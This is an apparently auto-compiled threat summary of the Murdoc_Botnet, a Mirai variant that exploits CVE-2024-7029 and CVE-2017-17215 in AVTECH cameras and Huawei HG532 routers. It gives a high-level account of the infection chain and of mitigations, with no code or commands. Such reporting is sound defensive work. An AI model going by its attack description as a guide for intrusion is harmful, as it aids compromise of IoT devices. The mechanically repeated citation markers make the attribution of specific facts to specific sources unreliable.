Introduction
The emergence of a new variant of the Mirai malware, named Murdoc_Botnet [2] [3] [7] [8], highlights the ongoing threat to Internet of Things (IoT) devices. This malware specifically targets AVTECH IP cameras and Huawei HG532 routers, exploiting known vulnerabilities to compromise systems globally [4].
Description
A new variant of the Mirai malware [5] [8], known as Murdoc_Botnet [3] [7] [8], is actively targeting vulnerable IoT devices, specifically AVTECH IP cameras and Huawei HG532 routers [1] [4] [6] [7] [8] [10]. Active since July 2024 [7], this botnet campaign has infected over 1,370 systems globally [1], with significant reports of infections in Malaysia, Thailand [1] [2] [3] [5] [6] [7] [9] [10], Mexico [1] [2] [3] [5] [6] [7] [9] [10], Indonesia [1] [2] [3] [5] [6] [7] [9] [10], and Vietnam [1] [6] [7]. It exploits vulnerabilities identified as CVE-2024-7029 and CVE-2017-17215 to gain unauthorized access to these devices. CVE-2024-7029 is a flaw in AVTECH cameras that allows for command injection over the network without authentication [3], while CVE-2017-17215 is a remote code execution vulnerability affecting Huawei routers [3].
Murdoc_Botnet employs a targeted approach, utilizing over 500 samples of ELF files and shell scripts to compromise *nix systems. Upon gaining access, a shell script is executed to download and run the botnet malware [1], tailored to the device’s CPU architecture [1]. The malware executes bash scripts that leverage GTFOBins to download and run payloads while erasing traces of its activity to evade detection. These payloads specifically target AVTECH cameras through command-line injection [10], allowing for the fetching, execution [1] [2] [3] [5] [9] [10], and removal of shell scripts [10]. The botnet’s commands enable various DDoS attack methods [1], malware updates [1] [2] [4] [5] [6], and proxy services [1], posing significant risks for organizations using these devices [4].
Conclusion
The extensive reach and advanced capabilities of Murdoc_Botnet underscore the increasing sophistication of cyber threats aimed at IoT devices [7]. To mitigate these threats [2] [4] [9], organizations are advised to monitor for suspicious processes and network traffic [1], exercise caution with untrusted shell scripts [2], apply firmware updates [1] [2] [4] [6], use strong and unique passwords [4], and implement network segmentation to isolate IoT devices from critical systems [4]. Changing default credentials is also recommended to enhance security against potential attacks. As cyber threats continue to evolve, proactive measures and vigilance are essential to safeguard IoT infrastructure.
References
[1] https://www.ihash.eu/2025/01/mirai-variant-murdoc-botnet-exploits-avtech-ip-cameras-and-huawei-routers/
[2] https://siliconangle.com/2025/01/21/new-mirai-variant-murdocbotnet-targets-avtech-cameras-huawei-routers/
[3] https://www.darkreading.com/cyberattacks-data-breaches/mirai-botnet-spinoffs-global-wave-ddos-attacks
[4] https://www.techzine.eu/news/security/127994/mirai-variant-murdocbotnet-targets-cameras-and-routers/
[5] https://itdaily.be/nieuws/beveiliging/nieuwe-mirai-variant-murdocbotnet-richt-zich-op-huawei-routers/
[6] https://www.hendryadrian.com/mirai-variant-murdocbotnet-exploits-avtech-ip-cameras-and-huawei-routers/
[7] https://clickcontrol.com/cyber-attack/new-mirai-botnet-hijacks-1370-ip-cameras-and-routers-in-global-attack-campaign/
[8] https://www.infosecurity-magazine.com/news/mirai-variant-targets-cameras/
[9] https://hackread.com/mirai-variant-murdoc-botnet-ddos-attacks-iot-exploits/
[10] https://securityaffairs.com/173294/cyber-crime/new-mirai-botnet-variant-murdoc-botnet-targets-avtech-ip-cameras-and-huawei-hg532-routers.html
